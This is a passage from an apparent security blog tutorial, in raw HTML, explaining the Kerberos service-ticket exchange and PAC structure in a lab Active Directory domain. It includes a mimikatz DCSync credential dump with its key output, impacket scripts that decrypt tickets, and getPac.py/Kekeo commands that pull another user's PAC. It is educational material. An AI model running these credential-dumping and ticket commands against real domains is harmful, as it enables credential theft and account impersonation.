field-5=20200424142303Z\r\n field-6=20200424142303Z\r\n field-7=20200425002303Z\r\n field-8=20200425142303Z\r\n field-9=SequenceOf:\r\n  Sequence:\r\n   field-0=1\r\n   field-1=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\r\n<\/pre>\n<ul>\n<li>Username and Realm: win10user@JNKFO.LAB<\/li>\n<li><strong>Session key<\/strong>: The same session key as the key in message A<\/li>\n<li>Timestamp and lifetime<\/li>\n<li>PAC data<\/li>\n<\/ul>\n<p>So, at this step, once the client gets these messages, it decrypts Message A using the key derived from the user&#8217;s password and obtains the <span style=\"color: #ff0000;\">session key\u00a0<span style=\"color: #000000;\">which, as you noticed, is the same in messages A and B.<\/span><br \/>\n<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-606\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/15.png\" alt=\"\" width=\"673\" height=\"244\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-606\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/15.png\" alt=\"\" width=\"673\" height=\"244\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/15.png 673w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/15-300x109.png 300w\" sizes=\"auto, (max-width: 673px) 100vw, 673px\" \/><\/noscript><\/p>\n<p>The client can&#8217;t decrypt Message B, as it&#8217;s encrypted using the TGS key (krbtgt hash) as mentioned earlier, but the TGT is stored in the cache to be used later.<br \/>\nNow the client needs to get a ticket with which he can access the service he needs, the SMB service with which we were communicating in the 1st place.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"TGS-REQ\"><\/span>TGS-REQ<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>At this point, the client will start 
asking for the targeted service, rather than the krbtgt service we were communicating with so far.<\/p>\n<p>So the client sends the TGS-REQ which includes 2 parts, a plaintext part that indicates the service the client needs to access (The SPN)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-630\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-1024x703.png\" alt=\"\" width=\"1024\" height=\"703\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-630\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-1024x703.png\" alt=\"\" width=\"1024\" height=\"703\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-1024x703.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-300x206.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-768x527.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1.png 1041w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>which is cifs\/win10.jnkfo.lab<\/p>\n<p>and another 2 encrypted messages<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Message_C\"><\/span>Message C<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This contains the <strong>TGT<\/strong> which was retrieved from the previous step (<strong>Message B<\/strong>)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-610\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18.png\" alt=\"\" width=\"949\" height=\"419\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-610\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18.png\" alt=\"\" width=\"949\" height=\"419\" 
srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18.png 949w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18-300x132.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18-768x339.png 768w\" sizes=\"auto, (max-width: 949px) 100vw, 949px\" \/><\/noscript><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Message_D\"><\/span>Message D<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>or the Authenticator, an encrypted message generated by the client that contains the username and the timestamp<\/p>\n<p>This message (authenticator) is encrypted using the session key retrieved from <strong>Message A<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-611\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20.png\" alt=\"\" width=\"939\" height=\"300\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-611\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20.png\" alt=\"\" width=\"939\" height=\"300\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20.png 939w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20-300x96.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20-768x245.png 768w\" sizes=\"auto, (max-width: 939px) 100vw, 939px\" \/><\/noscript><\/p>\n<p>The client sends this request to the KDC, which does the following<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-613\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/21.png\" alt=\"\" width=\"600\" height=\"352\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-613\" 
src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/21.png\" alt=\"\" width=\"600\" height=\"352\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/21.png 600w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/21-300x176.png 300w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/noscript><\/p>\n<ol>\n<li>Extract the TGT from message C<\/li>\n<li>Decrypt the TGT at <strong>Message C<\/strong> using the TGS key (krbtgt key which is stored at the KDC), and retrieve the session key, username, and the timestamp from the TGT (message B).<\/li>\n<li>Use the session key to decrypt the authenticator which contains the username and the timestamp.<\/li>\n<li>Compare the username and timestamp from the TGT (1) with the username and timestamp from the Authenticator (2)<\/li>\n<li>Check the TGT lifetime to make sure it&#8217;s not expired<\/li>\n<\/ol>\n<p>If everything is ok, then the user proved his identity and the authentication process will go on<\/p>\n<h2><span class=\"ez-toc-section\" id=\"TGS-REP\"><\/span>TGS-REP<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>After validating the client&#8217;s identity, the KDC needs to create a TGS, the one which the client will use to authenticate to the service.<\/p>\n<p>The KDC generates a random key (Service session key) and sends back the TGS-REP which includes 2 messages.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-615\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22.png\" alt=\"\" width=\"1009\" height=\"642\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-615\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22.png\" alt=\"\" width=\"1009\" height=\"642\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22.png 1009w, 
https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22-300x191.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22-768x489.png 768w\" sizes=\"auto, (max-width: 1009px) 100vw, 1009px\" \/><\/noscript><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Message_E\"><\/span>Message E<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This message includes a plaintext part which contains the SPN the user is trying to access (cifs\/win10.jnkfo.lab), and another part which is encrypted using the service key, which means that the user is unable to decrypt or manipulate it. This part includes the following information<\/p>\n<ul>\n<li>Service session key<\/li>\n<li>Username<\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<li>PAC information<\/li>\n<\/ul>\n<p>As mentioned, this part can be decrypted using the service key. For a service like this one, Kerberos is using the machine account&#8217;s key, which can be obtained from the DC via<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">mimikatz # lsadump::dcsync \/user:WIN10$ \/domain:jnkfo.lab\r\n[DC] 'jnkfo.lab' will be the domain\r\n[DC] 'DC.jnkfo.lab' will be the DC server\r\n[DC] 'WIN10$' will be the user account\r\n\r\nObject RDN           : WIN10\r\n\r\n** SAM ACCOUNT **\r\n\r\nSAM Username         : WIN10$\r\nAccount Type         : 30000001 ( MACHINE_ACCOUNT )\r\nUser Account Control : 00001000 ( WORKSTATION_TRUST_ACCOUNT )\r\nAccount expiration   :\r\nPassword last change : 3\/29\/2020 7:16:42 PM\r\nObject Security ID   : S-1-5-21-3178339118-3033626349-2532976716-1105\r\nObject Relative ID   : 1105\r\n\r\nCredentials:\r\n  Hash NTLM: 1ad9c160bd7ab9cb4b7c890c96862305\r\n    ntlm- 0: 1ad9c160bd7ab9cb4b7c890c96862305\r\n    ntlm- 1: 5e591b183142300b96281c9b75aaaf99\r\n    lm  - 0: 3c0bd3dace8dc8f6fabcb58db7761cf3\r\n    lm  - 1: 1c9cbdcb85af1552edd2e70e4379563d\r\n\r\nSupplemental Credentials:\r\n* Primary:Kerberos-Newer-Keys *\r\n    Default Salt : JNKFO.LABhostwin10.jnkfo.lab\r\n    Default Iterations : 
4096\r\n    Credentials\r\n      aes256_hmac       (4096) : d9060eb5200bf63461b1525277212c2d6cddb66a3eac26807183809e27b41ca8\r\n      aes128_hmac       (4096) : 1b972a7269a8d841d15bd32577e39a27\r\n      des_cbc_md5       (4096) : b0e97c31dc9edf3b<\/pre>\n<p>So this part can be decrypted using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from impacket.krb5.pac import PACTYPE, VALIDATION_INFO\r\nfrom pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\nimport struct\r\n# etype 18 = aes256-cts-hmac-sha1-96\r\ncipher = _enctype_table[18]\r\n# the WIN10$ machine account's aes256_hmac key from the dcsync output above\r\nkey = Key(18, unhexlify(\"d9060eb5200bf63461b1525277212c2d6cddb66a3eac26807183809e27b41ca8\"))\r\n# the enc-part cipher of the service ticket in the TGS-REP\r\nmycipher = \"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\"\r\n# key usage 2 = ticket enc-part encrypted with the service key (RFC 4120)\r\njnk = cipher.decrypt(key, 2, unhexlify(mycipher))\r\n# DER-decode the EncTicketPart; [0] drops the (empty) trailing bytes\r\ndec = decoder.decode(jnk)[0]\r\nprint(\"------------------- Ticket Data ------------------\")\r\nprint(dec)<\/pre>\n<p>The output is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=1084293120\r\n field-1=Sequence:\r\n  field-0=23\r\n  field-1=0x2c0d86037d0014a317d8c5aee4e8d339\r\n\r\n field-2=JNKFO.LAB\r\n field-3=Sequence:\r\n  field-0=1\r\n  field-1=SequenceOf:\r\n   win10user\r\n\r\n field-4=Sequence:\r\n  field-0=1\r\n  field-1=\r\n\r\n field-5=20200424142303Z\r\n field-6=20200424142303Z\r\n field-7=20200425002303Z\r\n field-8=20200425142303Z\r\n field-9=SequenceOf:\r\n  Sequence:\r\n   field-0=1\r\n   field-1=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\r\n<\/pre>\n<p>You&#8217;ll note<\/p>\n<ul>\n<li>Encryption type: 23<\/li>\n<li>A <span style=\"color: #ff0000;\">service session key<\/span>: 2c0d86037d0014a317d8c5aee4e8d339<\/li>\n<li>Client name: win10user<\/li>\n<li>Realm: JNKFO.LAB<\/li>\n<li>Timestamp and PAC<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"Message_F\"><\/span>Message F<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img 
loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-616\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23.png\" alt=\"\" width=\"819\" height=\"259\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-616\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23.png\" alt=\"\" width=\"819\" height=\"259\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23.png 819w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23-300x95.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23-768x243.png 768w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/noscript><\/p>\n<p>This message is encrypted using the session key which is already cached at the client (check AS-REP), so the user can decrypt this one easily and obtain<\/p>\n<ul>\n<li><span style=\"color: #ff0000;\">Service session key<\/span><\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<li>Service name<\/li>\n<\/ul>\n<p>Note that the Service session key is found in both messages.<\/p>\n<p>So let&#8217;s decrypt that cipher using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from impacket.krb5.pac import PACTYPE, VALIDATION_INFO\r\nfrom pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\ncipher = _enctype_table[18]\r\nkey = Key(18, unhexlify(\"64586df7e4620c197c1889f84d3aa825c4c6060d12633a83bfc9af11f5fdab64\"))\r\nmycipher = \"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\"\r\njnk = cipher.decrypt(key, 8, unhexlify(mycipher))\r\ndec = decoder.decode(jnk)[0]\r\nprint dec<\/pre>\n<p>The output is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=Sequence:\r\n  field-0=23\r\n  
field-1=0x2c0d86037d0014a317d8c5aee4e8d339\r\n\r\n field-1=SequenceOf:\r\n  Sequence:\r\n   field-0=0\r\n   field-1=20200424142303Z\r\n\r\n field-2=2035677725\r\n field-3=1084293120\r\n field-4=20200424142303Z\r\n field-5=20200424142303Z\r\n field-6=20200425002303Z\r\n field-7=20200425142303Z\r\n field-8=JNKFO.LAB\r\n field-9=Sequence:\r\n  field-0=2\r\n  field-1=SequenceOf:\r\n   cifs   win10.jnkfo.lab\r\n\r\n field-10=SequenceOf:\r\n  Sequence:\r\n   field-0=165\r\n   field-1=0x1f000000\r\n<\/pre>\n<p>Did you notice <span style=\"color: #ff0000;\">2c0d86037d0014a317d8c5aee4e8d339<\/span> again? It is the same service session key that sits inside the encrypted service ticket above; this copy is the one the client can read.<\/p>\n<p>At this point the client holds both the service session key and the service ticket, and is ready to talk to the service.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Accessing_the_service_AP-REQ\"><\/span>Accessing the service (AP-REQ)<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Communication between the client and the KDC is now over; the client needs to access the SMB service.<br \/>\nIt does so by sending two messages to the service<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-617\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24.png\" alt=\"\" width=\"979\" height=\"763\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-617\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24.png\" alt=\"\" width=\"979\" height=\"763\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24.png 979w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24-300x234.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24-768x599.png 768w\" sizes=\"auto, (max-width: 979px) 100vw, 979px\" \/><\/noscript><\/p>\n<p>1 &#8211; The service ticket (Message E) that the client obtained before<\/p>\n<p>2 &#8211; 
Message G or Authenticator message<\/p>\n<p>This consists of the username and a timestamp, and is encrypted using the service session key that the client obtained from Message F in the previous step.<\/p>\n<p>Once the service receives this request, it decrypts the service ticket using its own key,<br \/>\nextracts the <span style=\"color: #ff0000;\">service session key<\/span>, <span style=\"color: #0000ff;\">username, and timestamp<\/span>,<br \/>\nand uses the service session key to decrypt the authenticator message and retrieve the <span style=\"color: #0000ff;\">username and timestamp<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-618\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/25.png\" alt=\"\" width=\"549\" height=\"318\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-618\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/25.png\" alt=\"\" width=\"549\" height=\"318\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/25.png 549w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/25-300x174.png 300w\" sizes=\"auto, (max-width: 549px) 100vw, 549px\" \/><\/noscript><\/p>\n<p>The server then<\/p>\n<ol>\n<li>compares the username from the authenticator with the username from the service ticket<\/li>\n<li>checks that the authenticator&#8217;s timestamp is within the allowed clock skew (5 minutes by default) of its own clock, which is also what limits replay of a captured authenticator<\/li>\n<li>checks the lifetime to make sure that the service ticket is already valid and hasn&#8217;t expired<\/li>\n<\/ol>\n<p>If everything checks out, the <span style=\"color: #ff0000;\">authentication<\/span> process is over; the client can keep authenticating to the service with that ticket until it expires.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Authorization\"><\/span>Authorization<span 
class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>As mentioned earlier, the whole process is about authentication, not authorization.<br \/>\nYou will notice that there are no privileges checks that took place at all during the entire process, as this will depend on the service or the local machine&#8217;s policies itself.<br \/>\nFor that matter, the PAC part is also attached to the ticket.<br \/>\nIt includes information about the user group memberships among other information.<br \/>\nWe can read the PAC attached to the service ticket using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from impacket.krb5.pac import PACTYPE, VALIDATION_INFO\r\nfrom pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\nimport struct\r\ncipher = _enctype_table[18]\r\nkey = Key(18, unhexlify(\"d9060eb5200bf63461b1525277212c2d6cddb66a3eac26807183809e27b41ca8\"))\r\nmycipher = \"f9eec5f1876a6f53fdaa7884b03205c743fc009487b1eb8b68594e13a0321a39dc42d5e5f747184ccd1ffb59b5956ee20b53e4b0256d688ddfb01c00082ec86f14bf276c68f86bf9f9244ea0f2a568b0e278f82190b388294500deb8860f6301e5dc383c0c8869fa396ddae8e18230d153b112396ec4cf692f30374fb53e4279e805e681fc724924d0d1288488b0c2b08fb40987620a335ca4613d919b3733c5270f34151d6d4648e8c20d4d3ad3616cc330fed0b7c734cd77add28beda3efe5a04dc148b611be00117ca500fd3ee3d00efebb62085eff1883d5a40a9b150798439e7e6f6e52b102246a9a94bface1409bdf08063d0bedc6c95b4fc65c89dc9f79e98b9f7909882253cfb2c6029e2f308bb9b5ef69c30593365194ea73d55962198c9b6753540adf472165b73a84ec0b74bc37d02658c807f396036cbf3f868c47e8a9873a0eebdbdb46ddb97063ee4972f8e4d405d62606c4ec43497fe44989d2deb14b5ad22a6425bfb90416ac8a4c28bd2c40097c5a63e18eb4b9e158a3785954f5edb6b994f2ed1e03734d1b5da870dcce547e383d09efd4f13c35a19121d7c6a3bbc4267307b5f9d9c9ab84a4a786bb7affce9055c92ed3e9245ad2070116a8cd25dc0545e8602fba1d726bfd2ee4502e1b3b72f2c4ec555a42494390ea97726cbaa1587ac38bfa5280ebce0429f82076d
4fb02dc28273b9cf316c58348feb6b693df5dddc3ff216764daac836aadcfbb708827ba01ae81f24e7ce62b95072d075269ba7c69b1f4d6123389cffdcf6f0289d4d17f53987cdd004bd6f6c222dd3a8beb4e16da02b1651848492c5020a713f293f4366280fb0cd9d0586dd62eb531f5cdeeb08fe607971cc4698aa01013e0729978f794f2eb4009c76c56534a9942c3d29d84d630cccfbe3ef78950a57535df0410889eec9197470f556a21235259bb7a82d2cd59738b7ea2ea87e9dc9fc6e1fdc50dd59df0a1818ceade470c05b4b2e4a1c69aba5b0edc5c2e8bb9f28e16bf1bd0b1b960bfc80f7ebc729c3f83aca48b24d411368a95354db446a6450896969644c8892914b974a066ddce78ecd738f76546153095f70177630b6d8d961a806f2b959be6e2a3c73d430f1dae9b562876ff602966f48d65fd33af396ed31c79ca2a8bf409e04779ec0d978f3624441645f290d11b20f5847ea0211d8377ad61127dcbf02a1fa8ab2b7ed51ed9abf0d484c5ac3315d1b864b55d598f6b705509c37fb88eddc65ddb136c090e285c33968f32e1816e29fbcfa307f0cdef28fa7d6b0d54cf1c525e6be479a1\"\r\njnk = cipher.decrypt(key, 2, unhexlify(mycipher))\r\ndec = decoder.decode(jnk)[0]\r\nprint \"------------------- Ticket Data ------------------\"\r\nprint dec\r\n\r\npacData = dec['field-9'][0]['field-1']\r\ndecAuthData = decoder.decode(pacData)[0][0]['field-1']\r\npacBuffers = PACTYPE(str(decAuthData))\r\npacBuffer = pacBuffers['Buffers']\r\npacBufferHex = hexlify(pacBuffer)\r\ndword = 8\r\nbuff = []\r\nfor i in range(0,32,dword):\r\n  buffstr = pacBufferHex[i:i+dword]\r\n  buffint = int(buffstr,16)\r\n  buffstr = hexlify(struct.pack('&lt;L',buffint))\r\n  buffint = int(buffstr,16)\r\n  buff.append(buffint)\r\n\r\npacInfoList = buff\r\nauthDataLength = pacInfoList[1]\r\nauthDataOffset = pacInfoList[2]\r\nauthDataEnd = (authDataLength * 2) - 40\r\noffsetStart = 24 + authDataOffset*2\r\nauthDataHex = pacBufferHex[offsetStart:offsetStart+authDataEnd]\r\nprint \"------------------- PAC Data ------------------\"\r\nfinalValidationInfo = VALIDATION_INFO()\r\nfinalValidationInfo.fromStringReferents(unhexlify(authDataHex))\r\nfinalValidationInfo.dump()\r\n<\/pre>\n<p>Output is<\/p>\n<pre class=\"EnlighterJSRAW\" 
data-enlighter-language=\"null\">VALIDATION_INFO \r\nCommonHeader:                   \r\n    Version:                         1 \r\n    Endianness:                      16 \r\n    CommonHeaderLength:              8 \r\n    Filler:                          3435973836 \r\nPrivateHeader:                  \r\n    ObjectBufferLength:              0 \r\n    Filler:                          3435973836 \r\nData:                           \r\n    LogonTime:                      \r\n        dwLowDateTime:                   2905707874 \r\n        dwHighDateTime:                  30808641 \r\n    LogoffTime:                     \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    KickOffTime:                    \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordLastSet:                \r\n        dwLowDateTime:                   3611792846 \r\n        dwHighDateTime:                  30806234 \r\n    PasswordCanChange:              \r\n        dwLowDateTime:                   28399054 \r\n        dwHighDateTime:                  30806436 \r\n    PasswordMustChange:             \r\n        dwLowDateTime:                   3433108942 \r\n        dwHighDateTime:                  30814683 \r\n    EffectiveName:                   u'win10user' \r\n    FullName:                        u'' \r\n    LogonScript:                     u'' \r\n    ProfilePath:                     u'' \r\n    HomeDirectory:                   u'' \r\n    HomeDirectoryDrive:              u'' \r\n    LogonCount:                      79 \r\n    BadPasswordCount:                0 \r\n    UserId:                          1104 \r\n    PrimaryGroupId:                  513 \r\n    GroupCount:                      1 \r\n    GroupIds:                       \r\n        [\r\n             \r\n            RelativeId:                      513 \r\n            Attributes:              
        7 ,\r\n        ] \r\n    UserFlags:                       32 \r\n    UserSessionKey:                 \r\n        Data:                            '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    LogonServer:                     u'DC' \r\n    LogonDomainName:                 u'JNKFO' \r\n    LogonDomainId:                  \r\n        Revision:                        1 \r\n        SubAuthorityCount:               4 \r\n        IdentifierAuthority:             '\\x00\\x00\\x00\\x00\\x00\\x05' \r\n        SubAuthority:                   \r\n            [\r\n                 21,\r\n                 3178339118,\r\n                 3033626349,\r\n                 2532976716,\r\n            ] \r\n    LMKey:                           '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    UserAccountControl:              16 \r\n    SubAuthStatus:                   0 \r\n    LastSuccessfulILogon:           \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    LastFailedILogon:               \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    FailedILogonCount:               0 \r\n    Reserved3:                       0 \r\n    SidCount:                        1 \r\n    ExtraSids:                      \r\n        [\r\n             \r\n            Sid:                            \r\n                Revision:                        1 \r\n                SubAuthorityCount:               1 \r\n                IdentifierAuthority:             '\\x00\\x00\\x00\\x00\\x00\\x12' \r\n                SubAuthority:                   \r\n                    [\r\n                         1,\r\n                    ] \r\n            Attributes:                      7 ,\r\n        ] \r\n    ResourceGroupDomainSid:          NULL \r\n    ResourceGroupCount:              0 \r\n    ResourceGroupIds:                NULL<\/pre>\n<p>It&#8217;s up to the 
service to use this information to validate the user&#8217;s privileges, impersonate, or delegate the logged-on user.<br \/>\nAs noted earlier, the PAC is found only inside the TGT and the TGS, meaning that in the first case it is encrypted with the krbtgt key and in the second with the service key.<br \/>\nSo there is no way for a user to manipulate the PAC without obtaining one of those two keys; this will come in handy later.<br \/>\nThe PAC also carries two signatures, one keyed with the service key and one with the krbtgt key. The service verifies the first on its own, but can only verify the second by sending an extra request to the KDC (PAC validation). By default Windows skips that request for services running as SYSTEM or holding SeTcbPrivilege, so the krbtgt signature is rarely checked in practice.<\/p>\n<p>You can obtain any user&#8217;s PAC using impacket&#8217;s getPac.py, which requests a ticket to yourself on behalf of the target user (S4U2Self) so that the PAC comes back encrypted with your own key<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">python getPac.py -targetUser administrator jnkfo.lab\/win10user:\"P@ssw0rd\"<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-620\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26.png\" alt=\"\" width=\"986\" height=\"855\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-620\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26.png\" alt=\"\" width=\"986\" height=\"855\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26.png 986w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26-300x260.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26-768x666.png 768w\" sizes=\"auto, (max-width: 986px) 100vw, 986px\" \/><\/noscript><\/p>\n<p>or using Kekeo, which does the same S4U2Self request<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">tgt::ask \/user:win10user@jnkfo.lab \/password:P@ssw0rd\r\ntgs::s4u \/tgt:TGT_win10user@jnkfo.lab@JNKFO.LAB_krbtgt~jnkfo.lab@JNKFO.LAB.kirbi \/user:administrator \/pac<\/pre>\n<h1><span class=\"ez-toc-section\" id=\"Kerberos_attacks\"><\/span>Kerberos attacks<span 
